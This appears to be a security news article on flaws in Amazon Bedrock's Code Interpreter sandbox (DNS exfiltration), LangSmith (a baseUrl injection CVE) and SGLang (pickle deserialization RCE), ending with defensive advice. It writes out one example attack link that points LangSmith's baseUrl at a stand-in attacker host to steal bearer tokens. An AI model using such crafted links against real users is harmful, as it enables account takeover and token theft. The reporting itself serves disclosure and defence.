Three critical security flaws discovered in Amazon Bedrock, LangSmith, and SGLang have exposed a fundamental problem plaguing AI infrastructure: sandbox isolation is failing spectacularly. These vulnerabilities demonstrate that even managed AI services from tech giants aren’t immune to classic attack patterns, revealing how quickly the AI gold rush has outpaced security fundamentals.
The flaws—ranging from DNS-based data exfiltration to remote code execution—paint a stark picture of an industry prioritizing speed over security. This isn’t just another vulnerability disclosure; it’s a wake-up call about the systemic weaknesses in AI platform isolation.
Amazon Bedrock: When “No Network Access” Means Something Else Entirely
Amazon Bedrock AgentCore Code Interpreter’s sandbox mode contains a glaring contradiction: despite advertising “no network access,” it permits outbound DNS queries that attackers can weaponize for data theft and command-and-control operations. The vulnerability, scored at 7.5 out of 10.0 on the CVSS scale, enables threat actors to:
- Establish bidirectional communication channels using DNS queries
- Obtain interactive reverse shells
- Exfiltrate sensitive data from accessible AWS resources
- Execute commands via DNS-delivered payloads
What makes this particularly dangerous is the potential for overprivileged IAM roles. A simple misconfiguration can grant the Code Interpreter broad permissions to access sensitive data across AWS infrastructure, turning a contained breach into a full-scale data exfiltration operation.
“Amazon Bedrock allows DNS-based data exfiltration, LangSmith had full account takeover, SGLang is still unpatched. Three major AI platforms, three different attack vectors, one common problem: isolation in AI systems is still treated as an afterthought.” — @NolteIT
Amazon’s response reveals a troubling industry mindset: they’ve classified this as “intended functionality” rather than a defect, pushing responsibility onto customers to use VPC mode for proper isolation. This echoes the early cloud computing era when providers similarly deflected security concerns onto customer configuration.
LangSmith: Social Engineering Meets AI Observability
LangSmith, a popular AI development platform, suffered from a high-severity URL parameter injection flaw (CVE-2026-25750, CVSS: 8.5) that exposed users to token theft and account takeover. The vulnerability stemmed from inadequate validation of the baseUrl parameter, allowing attackers to redirect API calls to malicious servers.
The attack vector is deceptively simple: trick users into clicking specially crafted links like smith.langchain.com/studio/?baseUrl=https://attacker-server.com. Once clicked, the victim’s bearer token, user ID, and workspace ID get transmitted to the attacker’s infrastructure.
The implications extend far beyond individual accounts. Successful exploitation grants access to AI trace history, internal SQL queries, CRM records, and proprietary source code—essentially the crown jewels of AI development operations.
SGLang: Triple Threat with Pickle Vulnerabilities
SGLang, an open-source framework for serving large language models, harbors three critical vulnerabilities that remain unpatched as of this writing. All three stem from unsafe pickle deserialization—a vulnerability class that has plagued Python applications for over a decade:
- CVE-2026-3059 (CVSS: 9.8): Unauthenticated RCE through ZeroMQ broker
- CVE-2026-3060 (CVSS: 9.8): Unauthenticated RCE through disaggregation module
- CVE-2026-3989 (CVSS: 7.8): Insecure pickle deserialization in crash dump utility
These flaws allow attackers to achieve remote code execution by sending malicious pickle files to exposed services. The first two vulnerabilities are particularly severe, requiring no authentication and affecting any deployment with network-exposed multimodal or disaggregation features.
“DNS-based exfiltration in Bedrock shows that even managed AI services aren’t immune to classic attack patterns. The problem: multi-tenant isolation is hard. When your workload shares infrastructure with untrusted code, you inherit its risks. This is why AI platforms need tenant isolation audits, not just vulnerability patches.” — @visions3c
The Isolation Crisis: Lessons from Computing History
These vulnerabilities mirror security failures from earlier computing paradigms. The DNS exfiltration technique used against Bedrock is reminiscent of data theft methods that plagued early virtualization platforms in the 2000s. Similarly, pickle deserialization attacks have been a known threat vector since the early days of Python web applications.
The AI industry appears to be repeating the same isolation mistakes that plagued virtual machines, containers, and early cloud platforms. Just as VMware had to evolve from basic process isolation to hardware-assisted virtualization, AI platforms need fundamental architectural changes to achieve true isolation.
Immediate Action Items for AI Security
Organizations running AI workloads need to implement these defensive measures immediately:
- Audit all Code Interpreter instances and migrate critical workloads from Sandbox to VPC mode
- Implement DNS firewalls to filter outbound DNS traffic from AI environments
- Apply the principle of least privilege to IAM roles attached to AI services
- Monitor for unexpected network connections from AI processes
- Restrict access to SGLang interfaces and ensure they’re not exposed to untrusted networks
- Update LangSmith to version 0.12.71 or later
The Bigger Picture: Security as an Afterthought
These discoveries highlight a systemic problem in AI development: security considerations are consistently treated as afterthoughts rather than foundational requirements. The rush to deploy AI capabilities has created a security debt that’s now coming due.
“🛑 Amazon Bedrock, LangSmith, and SGLang flaws expose data leaks, token theft, and RCE risks across AI platforms. Bedrock allows DNS-based exfiltration, LangSmith had account takeover, and SGLang remains vulnerable—showing weak isolation in real-world AI systems.” — @TheHackersNews
The fact that Amazon classifies DNS exfiltration as “intended functionality” rather than a security flaw demonstrates how the industry prioritizes flexibility over security. This approach worked when AI systems processed sanitized datasets in isolated research environments, but it’s completely inadequate for production systems handling sensitive data.
Building Secure AI Infrastructure
The path forward requires fundamental changes to how we architect AI systems. Rather than bolting security onto existing platforms, the industry needs to rebuild isolation mechanisms from the ground up. This means implementing hardware-assisted isolation, zero-trust networking, and assuming that AI workloads will attempt to escape their containers.
The cost of fixing these vulnerabilities after deployment far exceeds the investment required to build secure systems from the start. As AI systems become more autonomous and handle increasingly sensitive data, the stakes will only continue to rise.
These three vulnerabilities serve as a stark reminder that the AI revolution cannot succeed without a corresponding security evolution. The question isn’t whether more AI platforms will suffer similar breaches—it’s whether the industry will learn from these failures before the next wave of attacks hits.